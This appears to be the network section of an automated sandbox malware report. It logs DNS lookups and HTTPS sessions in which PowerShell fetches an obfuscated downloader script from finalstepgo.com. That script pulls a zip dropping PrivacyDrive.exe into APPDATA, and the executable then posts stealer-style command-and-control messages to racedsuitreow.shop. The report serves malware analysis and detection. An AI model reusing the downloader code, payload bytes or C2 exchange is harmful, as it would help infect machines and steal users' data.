                              Sep 26, 2024 17:46:58.319453001 CEST4966053192.168.2.41.1.1.1
                              Sep 26, 2024 17:46:58.332429886 CEST53496601.1.1.1192.168.2.4

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Sep 26, 2024 17:46:25.939004898 CEST192.168.2.41.1.1.10x47d4Standard query (0)finalstepgo.comA (IP address)IN (0x0001)false
                              Sep 26, 2024 17:46:47.739042997 CEST192.168.2.41.1.1.10xd7bStandard query (0)candleduseiwo.shopA (IP address)IN (0x0001)false
                              Sep 26, 2024 17:46:47.842585087 CEST192.168.2.41.1.1.10xef4dStandard query (0)racedsuitreow.shopA (IP address)IN (0x0001)false
                              Sep 26, 2024 17:46:58.319453001 CEST192.168.2.41.1.1.10x6dc7Standard query (0)candleduseiwo.shopA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Sep 26, 2024 17:46:26.108680010 CEST1.1.1.1192.168.2.40x47d4No error (0)finalstepgo.com185.255.122.133A (IP address)IN (0x0001)false
                              Sep 26, 2024 17:46:47.823362112 CEST1.1.1.1192.168.2.40xd7bName error (3)candleduseiwo.shopnonenoneA (IP address)IN (0x0001)false
                              Sep 26, 2024 17:46:47.856554031 CEST1.1.1.1192.168.2.40xef4dNo error (0)racedsuitreow.shop172.67.206.221A (IP address)IN (0x0001)false
                              Sep 26, 2024 17:46:47.856554031 CEST1.1.1.1192.168.2.40xef4dNo error (0)racedsuitreow.shop104.21.37.97A (IP address)IN (0x0001)false
                              Sep 26, 2024 17:46:58.332429886 CEST1.1.1.1192.168.2.40x6dc7Name error (3)candleduseiwo.shopnonenoneA (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • finalstepgo.com
                              • racedsuitreow.shop

                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449730185.255.122.1334437052C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              TimestampBytes transferredDirectionData
                              2024-09-26 15:46:26 UTC175OUTGET /uploads/il2.txt HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                              Host: finalstepgo.com
                              Connection: Keep-Alive
                              2024-09-26 15:46:27 UTC206INHTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 15:46:20 GMT
                              Server: Apache
                              Last-Modified: Thu, 26 Sep 2024 14:09:48 GMT
                              Accept-Ranges: bytes
                              Content-Length: 563
                              Connection: close
                              Content-Type: text/plain
                              2024-09-26 15:46:27 UTC563INData Raw: 24 44 43 39 6f 74 6a 30 56 3d 27 68 74 74 70 73 3a 2f 2f 66 69 6e 61 6c 73 74 65 70 67 6f 2e 63 6f 6d 2f 75 70 6c 6f 61 64 73 2f 69 6c 32 32 32 2e 7a 69 70 27 3b 20 24 4f 6f 39 49 47 46 72 58 3d 24 65 6e 76 3a 41 50 50 44 41 54 41 2b 27 5c 4f 49 6c 71 4a 59 75 45 27 3b 20 24 6a 52 41 59 6e 57 4f 53 3d 24 65 6e 76 3a 41 50 50 44 41 54 41 2b 27 5c 79 41 4e 72 64 4e 4b 54 2e 7a 69 70 27 3b 20 24 42 74 64 53 47 66 63 69 3d 24 4f 6f 39 49 47 46 72 58 2b 27 5c 50 72 69 76 61 63 79 44 72 69 76 65 2e 65 78 65 27 3b 20 69 66 20 28 2d 6e 6f 74 20 28 74 65 53 54 2d 50 61 74 48 20 24 4f 6f 39 49 47 46 72 58 29 29 20 7b 20 6e 65 77 2d 69 74 45 4d 20 2d 50 61 74 68 20 24 4f 6f 39 49 47 46 72 58 20 2d 49 74 65 6d 54 79 70 65 20 44 69 72 65 63 74 6f 72 79 20 7d 3b 20 53
                              Data Ascii: $DC9otj0V='https://finalstepgo.com/uploads/il222.zip'; $Oo9IGFrX=$env:APPDATA+'\OIlqJYuE'; $jRAYnWOS=$env:APPDATA+'\yANrdNKT.zip'; $BtdSGfci=$Oo9IGFrX+'\PrivacyDrive.exe'; if (-not (teST-PatH $Oo9IGFrX)) { new-itEM -Path $Oo9IGFrX -ItemType Directory }; S


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.449734185.255.122.133443732C:\Windows\System32\svchost.exe
                              TimestampBytes transferredDirectionData
                              2024-09-26 15:46:33 UTC155OUTHEAD /uploads/il222.zip HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              Accept-Encoding: identity
                              User-Agent: Microsoft BITS/7.8
                              Host: finalstepgo.com
                              2024-09-26 15:46:33 UTC215INHTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 15:46:26 GMT
                              Server: Apache
                              Last-Modified: Thu, 26 Sep 2024 14:09:59 GMT
                              Accept-Ranges: bytes
                              Content-Length: 1527814
                              Connection: close
                              Content-Type: application/zip


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.449735185.255.122.133443732C:\Windows\System32\svchost.exe
                              TimestampBytes transferredDirectionData
                              2024-09-26 15:46:34 UTC206OUTGET /uploads/il222.zip HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              Accept-Encoding: identity
                              If-Unmodified-Since: Thu, 26 Sep 2024 14:09:59 GMT
                              User-Agent: Microsoft BITS/7.8
                              Host: finalstepgo.com
                              2024-09-26 15:46:34 UTC215INHTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 15:46:27 GMT
                              Server: Apache
                              Last-Modified: Thu, 26 Sep 2024 14:09:59 GMT
                              Accept-Ranges: bytes
                              Content-Length: 1527814
                              Connection: close
                              Content-Type: application/zip
                              2024-09-26 15:46:34 UTC7977INData Raw: 50 4b 03 04 14 00 00 00 08 00 63 35 3a 59 4e 2b 47 29 60 4f 17 00 88 f8 2b 00 10 00 00 00 50 72 69 76 61 63 79 44 72 69 76 65 2e 65 78 65 ec 7d 7f 5c 54 45 f7 f0 dd 65 81 05 57 76 51 50 4a 54 d4 b5 2c d4 30 b4 34 34 41 5d 44 03 dd 15 59 f0 17 98 19 6e ab 25 e1 ae 62 8a 4a cb a2 b7 f1 a2 8f 69 a9 99 61 da 53 8f 59 69 9a a2 a9 a1 18 8b 4a 0a 66 66 69 6a 3e 56 97 c0 c2 34 45 43 ef 3b 67 e6 de fd 01 8b d0 f3 fd 3e ef e7 fd e3 b5 4f dc b9 73 cf cc 9c 39 73 ce 99 33 67 ce cc 26 4d 5c c9 f8 30 0c a3 c0 ff 0b 02 c3 14 33 f4 5f 2c d3 f2 bf 08 19 c3 04 75 dd 17 c4 ec 0a f8 aa 5b b1 2c f1 ab 6e e3 4d 2f cc 89 c8 ca 9e 3d 23 fb d9 17 23 9e 7b f6 a5 97 66 5b 22 a6 3d 1f 91 6d 7d 29 e2 85 97 22 46 8c 4d 8e 78 71 f6 f4 e7 fb b6 6d 1b a8 15 eb 98 b1 d1 3e a1 87 50 13 28
                              Data Ascii: PKc5:YN+G)`O+PrivacyDrive.exe}\TEeWvQPJT,044A]DYn%bJiaSYiJffij>V4EC;g>Os9s3g&M\03_,u[,nM/=##{f["=m})"FMxqm>P(
                              2024-09-26 15:46:34 UTC8000INData Raw: 1f af f0 89 e7 de 60 85 fb 7c 72 cb 35 64 86 e2 5d 10 73 d5 6f ae 14 73 75 84 cd d7 6e c7 59 ee 53 4b be b6 1c e7 48 b3 0b 46 21 5f bb 8b ca 24 83 93 c5 9e 49 7f 9a 94 00 32 71 7d 70 46 02 3f 2a 23 c8 63 03 7d 2b a2 70 45 62 11 f1 03 80 83 fd 5a 46 c1 65 68 05 68 37 88 d4 ce 3b 44 26 d9 f9 64 92 0d 80 b0 40 8e 82 ea b9 d5 da 0f 40 32 06 6f a7 81 5a fb 69 e3 d6 8e 18 60 3f 58 12 34 0e 8b 9b 46 43 b5 fa a1 a5 2a bf 66 e6 6d e8 6b 89 ab 48 bb 7d 52 e8 d6 08 6d 18 f8 7b d8 2b 98 ac fe 70 14 f1 24 96 97 90 34 a2 96 06 e3 16 a1 22 f0 de 84 89 6d e2 64 94 88 9f 7a 38 7d c2 84 8d eb 09 d1 83 a4 91 98 2d 2c 68 24 62 0b cf b6 7a fa 1e 25 a3 92 38 58 9c b0 63 c5 e7 f8 85 f4 7b a2 67 94 96 85 0a 4f be 36 df 35 06 cb 3c 93 40 5b 37 00 90 6e 8b 48 5c 39 ae 30 0b 16 23
                              Data Ascii: `|r5d]sosunYSKHF!_$I2q}pF?*#c}+pEbZFehh7;D&d@@2oZi`?X4FC*fmkH}Rm{+p$4"mdz8}-,h$bz%8Xc{gO65<@[7nH\90#
                              2024-09-26 15:46:34 UTC8000INData Raw: 1a be c0 84 9c f3 74 4b fb d5 7f 6d 6a c5 7e 4a ec 09 a3 cb bc 53 62 15 57 d4 2d c5 39 e9 87 48 6d 78 d9 43 6c da 5e e4 bb 2d c5 a7 ba 37 16 27 35 e6 65 4a 22 e3 1d 82 bb ab 4e 2d 49 fd 43 1d ac ab e5 16 29 53 e9 5d bd 7f a8 35 f1 11 99 ea c7 7c 97 64 a5 31 73 cd 9c ae 16 d7 93 00 97 44 e8 6e e0 d4 08 38 dd 9f 52 8f 2b e5 75 7f b5 c3 c9 3a 94 54 0b 55 dc e0 07 e0 77 db a2 81 50 43 d2 8d 3f d4 e9 e5 7f a8 27 b4 5d f9 72 1a 93 a9 ee 75 e8 0f f5 e4 f8 08 4b 00 7e 8c e9 85 ff 90 f7 28 0c e0 cb e3 66 08 0a a9 f4 62 60 5c 5a 57 9b e1 ed be f1 b4 77 5b a4 37 3f 67 8e 6b bb 5f 07 47 bc 31 cf 39 fc 12 30 5d f0 f8 37 67 8f 35 89 e7 44 71 2a 17 73 fc 9d f6 c5 16 f8 bb d9 6a e7 20 3f 36 b8 c5 41 a6 f5 2f 6b 69 7c c5 ca 8b b2 d5 cd d8 19 9e f5 6d 7f d7 cd 5e 0c 6f 26
                              Data Ascii: tKmj~JSbW-9HmxCl^-7'5eJ"N-IC)S]5|d1sDn8R+u:TUwPC?']ruK~(fb`\ZWw[7?gk_G190]7g5Dq*sj ?6A/ki|m^o&
                              2024-09-26 15:46:34 UTC8000INData Raw: 78 be 53 f1 de 3f 88 36 2a e2 59 81 bc f0 30 ce 36 a0 0f d6 7b d7 69 21 b6 26 31 b6 8a be 0f 1b fd 6c eb 0c 1f 00 f5 15 c2 00 e8 bf 2e c7 35 00 52 db d7 85 43 18 ff c8 9f 47 31 7f db 58 e3 28 c8 c8 3c e2 2a c5 71 d0 43 85 6c 1c b4 f6 82 2a 8e 8a 9b 89 e3 52 0c 71 4c 09 89 c3 7e 01 c5 91 db 65 18 67 74 e2 00 e9 bf bb 07 1c 20 19 99 d7 d7 87 73 9a e9 4c 85 4e 3e 03 ee f4 e4 d0 32 db 46 29 89 74 cc 87 a6 f5 01 e3 7e a8 5c 06 db 1b e8 ef 20 15 fc 1d 10 f0 ff ce 96 f8 5b 2a fc b5 66 a3 8b 83 80 fc 51 25 b8 38 20 ab b5 34 b1 e8 8b 56 7d 3f bc 1c 56 f7 e7 c1 1a e0 20 fb e1 98 28 4d 4b 14 95 1f 6c 8f a0 31 f8 f2 28 63 f0 dc 58 c6 e0 8e 30 63 70 7b c8 18 dc 42 b6 99 d9 05 70 56 b8 a8 d8 59 62 b1 3d f3 0a 7a 69 55 c0 98 78 c6 61 e7 11 db b3 60 4d d7 78 c6 bb d5 cf
                              Data Ascii: xS?6*Y06{i!&1l.5RCG1X(<*qCl*RqL~egt sLN>2F)t~\ [*fQ%8 4V}?V (MKl1(cX0cp{BpVYb=ziUxa`Mx
                              2024-09-26 15:46:35 UTC8000INData Raw: d6 11 63 48 74 c5 09 a7 91 44 7a 4c ab e4 f9 60 98 fa df 1f 45 6d 65 fc 40 78 63 af 33 8c cd ca 30 73 b3 82 61 e2 62 2e 33 37 39 c7 70 a9 e4 37 fd 83 52 88 23 9c 7c be 70 37 49 30 1f 24 f9 d8 50 7a 38 3b 37 ab 90 76 5e 1e 84 23 d5 73 f1 72 e3 02 35 5a f5 3a b8 34 cc 63 cc c5 23 b6 9b 63 36 c4 90 70 3c 62 5b c2 c3 a3 1b e1 fc 34 3e af 96 bf c5 0f 05 cf 79 27 5a 08 b0 ff 1d b8 da fc c7 96 4a 9f 0d 4c 9c b0 16 bb 4c 92 cb 9c 2b db dd c8 49 4d 28 84 37 2e 0e 2a e1 e6 58 71 98 1d 86 76 64 a8 fb 39 dc 9d fd db 7a f6 04 9c 50 ac 65 4f 3c 0c e8 25 b1 d2 3c 08 4a 48 e4 a6 e9 3c 69 a7 3b c6 e0 f5 f3 3b b1 98 b5 95 46 74 70 c9 c7 24 88 95 7b 21 26 5b ff 2d 9b 1e 70 2f 40 63 8e a5 9c c0 cc 19 78 c0 f0 be 4c 3c 60 38 75 11 9a 9b 7e 24 66 24 9a f8 f1 36 5e df 4e 9f ca
                              Data Ascii: cHtDzL`Eme@xc30sab.379p7R#|p7I0$Pz8;7v^#sr5Z:4c#c6p<b[4>y'ZJLL+IM(7.*Xqvd9zPeO<%<JH<i;;Ftp${!&[-p/@cxL<`8u~$f$6^N
                              2024-09-26 15:46:35 UTC8000INData Raw: 52 cd 42 1e af 88 ff da b5 77 2e 4c 2c 14 b8 30 31 87 27 6a c6 72 c9 03 97 70 fe fa ec 44 a5 40 9d b8 c1 87 72 94 e7 da e9 de 79 3e ca 27 05 7f 01 0a 57 91 91 a9 fc 57 94 32 e6 00 a3 08 c5 9a 39 28 d4 cc 91 bc 7c 43 72 84 b9 63 f3 ff f2 96 aa 87 08 ef c4 fd 06 0b a7 ac 04 8e 56 24 1a 82 0a 3f 73 94 07 bf 1f 13 7e 8e ce 6f cb 0d dc 4a 65 b0 30 e4 a4 52 1c c6 6b c8 fe 40 70 73 bd 10 f8 21 54 ab 33 ba 15 93 a4 05 2e a1 de 76 a2 5b 9b 75 c2 6a f6 b3 0e 7f 42 25 f5 d1 92 9a 26 8e bc f9 47 94 50 40 86 ff 79 0e ea 6e 6d 2d 3b 99 2f 79 08 14 2a 69 08 d1 34 43 34 a1 50 c9 ba 50 49 cd 75 db e6 12 39 ff 86 d6 2d 10 5e a3 b5 1b 34 66 06 97 7b f0 96 d3 5a 92 87 66 6d 54 ce cb 46 bd c8 d3 3e c6 9d 7c e1 ea 18 2a e6 fd 92 74 69 5d 75 b0 10 8d 05 9d c4 2b ad 01 bb b9 23
                              Data Ascii: RBw.L,01'jrpD@ry>'WW29(|CrcV$?s~oJe0Rk@ps!T3.v[ujB%&GP@ynm-;/y*i4C4PPIu9-^4f{ZfmTF>|*ti]u+#
                              2024-09-26 15:46:35 UTC8000INData Raw: d4 e9 fb aa cc ff 23 fa 36 29 b3 13 e8 db 7e 4e f4 6d bf 24 e9 db 7e 49 d1 77 c5 a5 4b e0 f6 8b 47 e0 a7 04 9d c0 ef 12 ce 81 c0 e3 8c 95 9a 3e 47 8c c4 6e 4f d4 98 c7 2b 57 56 d8 d6 fd b3 c0 6e e1 d6 80 a0 be 05 25 45 c2 bd 8c dc ba db 16 44 54 72 ab 4e 5a ea 89 bc 3f 03 c2 de e7 55 a0 21 3f 8a 36 59 e6 3a 25 b9 a2 72 8b 99 85 53 82 99 94 45 2b 9d bf 50 e4 bf 34 5f 20 6d 72 e3 83 25 45 2a 01 e2 9d 4a 5e 91 9e 68 4e 93 e1 48 82 3b d5 0a 3e 00 e7 64 9f 0d 44 cf cf 3e 7b 68 7e 2a fb ec bf cd bf 04 ec b3 ab a2 69 e5 bf 99 9f ca 9e 48 e6 5d 1a f7 23 56 a6 d5 9f bb e7 a5 ea 4f fe bc 8b 6a 1f 55 ed cd 15 23 dc de fc 53 7e 45 6c a9 66 6f 0e 9d b9 2c 3e 63 d2 6c 30 3a 6f fc 57 66 74 6e 75 c2 f5 b0 56 e7 14 b3 f3 c3 f6 34 cc ce 49 ec b3 5f b7 9f 9b 7d f6 8c 2d f5
                              Data Ascii: #6)~Nm$~IwKG>GnO+WVn%EDTrNZ?U!?6Y:%rSE+P4_ mr%E*J^hNH;>dD>{h~*iH]#VOjU#S~Elfo,>cl0:oWftnuV4I_}-
                              2024-09-26 15:46:35 UTC8000INData Raw: ec 11 34 6d 3b ec a6 e8 71 16 52 e4 a7 38 f5 42 ff af 0d 45 1f a0 3a 65 04 0d c0 30 c1 6c 00 c5 9d ab 20 56 97 93 9b 0c eb 20 d6 09 f4 68 92 a6 90 bc 1f a7 64 6d b5 b8 f2 0a a4 2f 84 48 22 1b 5b 80 d7 08 71 c2 50 06 97 6d 0d 90 13 6c 7d b3 a4 63 42 18 29 7d 2b e7 1a e5 1b d4 7e 82 9f ab c3 d5 99 51 80 47 51 72 2c d8 d6 43 ad a9 f5 41 a9 b4 80 56 b3 45 6f bd 43 8a 5c 07 a7 73 81 7b aa f5 e8 22 30 c4 5f 06 ae 5f e4 6a 38 83 46 b2 72 d4 14 2b 84 16 8d ed 90 28 f9 0a 1f 0a 84 f1 89 d3 32 00 47 80 67 74 94 fc 08 b4 4d 58 8d c4 64 43 9a 06 39 cd 1c 0b e5 34 0a 38 89 1d e0 2c 91 30 62 80 01 e5 be 33 6e 5c ac 69 c4 5e 76 dc de 11 07 d9 71 07 5b c0 cc 1f 78 47 35 08 43 a1 1c 3b f0 92 8f db 89 7f 52 1c 7b 88 39 15 d6 fc 15 0c 89 62 4e 31 58 c9 93 8f 55 ce 2a c8 22
                              Data Ascii: 4m;qR8BE:e0l V hdm/H"[qPml}cB)}+~QGQr,CAVEoC\s{"0__j8Fr+(2GgtMXdC948,0b3n\i^vq[xG5C;R{9bN1XU*"
                              2024-09-26 15:46:35 UTC8000INData Raw: a6 38 64 4d 54 9f 7d 27 c6 eb 2f 9e 3b ab 62 fa 8b 75 cc fe 02 8f 49 c1 82 c9 13 e8 36 ac fc 73 13 a6 e7 d6 d7 8d f4 6c 78 75 24 3d f3 23 66 8f 4e 4f eb 28 fd 05 1e b6 60 a1 6d 6b c9 e4 e0 c2 c9 df 86 c8 6c 3d 41 2f e5 79 68 e8 3e b5 8a 2c 4a 21 d8 77 2a 49 2a 10 be 0c e8 5e 04 44 07 56 8b cd e1 87 3c 49 09 e8 9d de 35 81 fd 9b 2b ba c5 a2 56 19 2d 38 0c 70 be 5e b2 76 f4 0d 9c ca cf 4d 24 ff 59 f1 f9 6b eb c7 70 c3 78 f9 37 4c 24 7f 6b 7c fe da 7a b3 7b f4 fc 89 49 d9 8b d2 14 7c 1e 57 9f 5d ea 13 8f 3b d5 f2 fb c6 2f 5f be 23 5d bf 6c 15 b1 ec be ab 4a 95 2b d1 f7 a6 6d 7a 68 07 0b b0 fe d2 b4 53 8f df ad 87 f6 44 53 a0 e0 a9 e9 90 26 08 6a 7a 4f fd b2 4a 6a 6a 55 6f 61 85 5a 50 ae 23 ff db 4c f5 0e 56 d3 5e 3d 1f bc 70 c2 71 dc d8 56 41 12 dc 3f 7a fc
                              Data Ascii: 8dMT}'/;buI6slxu$=#fNO(`mkl=A/yh>,J!w*I*^DV<I5+V-8p^vM$Ykpx7L$k|z{I|W];/_#]lJ+mzhSDS&jzOJjjUoaZP#LV^=pqVA?z
                              2024-09-26 15:46:35 UTC8000INData Raw: 2f 0e e7 ff 51 b8 5b 14 bf 7c be 11 55 be d3 22 ff 95 c7 c3 e5 db a4 7c 2c 53 d2 b6 51 c8 97 31 5d fc 60 a7 b0 c8 a4 e5 2c 5e 14 73 4c 6b f8 09 08 cf 5e e6 14 6f 9a 16 35 06 4f bf eb 2e 6b ea eb 4f 54 6a 65 22 f1 7f 5e 23 6f 56 d7 2c 2b ad db f9 d8 a1 bb cf 7a 48 c3 09 ac b4 0e d2 fd 01 11 6e 9d 35 9c 5f 86 3b e3 21 8d 32 dc 8b 3c 9c f7 41 23 89 2b 81 0f 78 88 5f e2 8f 0b bc c4 c0 17 02 ef f7 90 56 89 df 2b f0 59 8e d7 4b ce 3a 5e 77 9f d9 fb 79 c2 f8 03 8c 18 30 88 7e 4e e0 dc 65 82 51 a2 fb 78 79 ee b3 e6 97 95 60 42 78 8e 8d fa fa be 41 64 e5 77 d6 ac bc 2a b3 92 60 66 f9 70 ab 08 f7 ac 35 5c 8b 59 34 46 96 5f e1 e1 bc ff 60 64 69 95 2c 12 23 cb 41 81 df 69 e0 8b 64 91 18 59 fe 7b 81 df c8 b2 9c c0 32 78 96 67 30 32 ef 30 f6 50 59 e6 06 be e2 57 fa 77
                              Data Ascii: /Q[|U"|,SQ1]`,^sLk^o5O.kOTje"^#oV,+zHn5_;!2<A#+x_V+YK:^wy0~NeQxy`BxAdw*`fp5\Y4F_`di,#AidY{2xg020PYWw


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.449744172.67.206.2214432504C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
                              TimestampBytes transferredDirectionData
                              2024-09-26 15:46:48 UTC265OUTPOST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 8
                              Host: racedsuitreow.shop
                              2024-09-26 15:46:48 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                              Data Ascii: act=life
                              2024-09-26 15:46:48 UTC551INHTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 15:46:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Re0xI7BSYN7MsD6%2BVlc029%2FUMvMlYltWU%2FyjK6QASRKj8sCmeKxIxA9P6U4WNxyI5bjxJTKkTcNXEgGZdeLItaWwL7dSuV6aK37edUB9FDwAEusKIgAcDMojZ2YsUTPdCThPdys%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c94638d2bf142bf-EWR
                              2024-09-26 15:46:48 UTC818INData Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-09-26 15:46:48 UTC1369INData Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b
                              Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
                              2024-09-26 15:46:48 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 32 56 62 4c 55 74 58 6f 49 71 61 32 70 6c 30 75 53 76 64 36 42 36 43 52 50 46 46 43 70 34 46 66 55 46 31 55 66 69 58 33 6b 67 38 2d 31 37 32 37 33 36 35 36 30 38 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74
                              Data Ascii: <input type="hidden" name="atok" value="2VbLUtXoIqa2pl0uSvd6B6CRPFFCp4FfUF1UfiX3kg8-1727365608-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" st
                              2024-09-26 15:46:48 UTC849INData Raw: 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61
                              Data Ascii: m:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a
                              2024-09-26 15:46:48 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.449745172.67.206.2214432504C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
                              TimestampBytes transferredDirectionData
                              2024-09-26 15:46:49 UTC355OUTPOST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Cookie: __cf_mw_byp=2VbLUtXoIqa2pl0uSvd6B6CRPFFCp4FfUF1UfiX3kg8-1727365608-0.0.1.1-/api
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 49
                              Host: racedsuitreow.shop
                              2024-09-26 15:46:49 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 72 75 69 31 32 32 32 26 6a 3d
                              Data Ascii: act=recive_message&ver=4.0&lid=yJEcaG--rui1222&j=
                              2024-09-26 15:46:49 UTC802INHTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 15:46:49 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=9qf2pccqovrdasfka88o2bem2c; expires=Mon, 20 Jan 2025 09:33:28 GMT; Max-Age=9999999; path=/
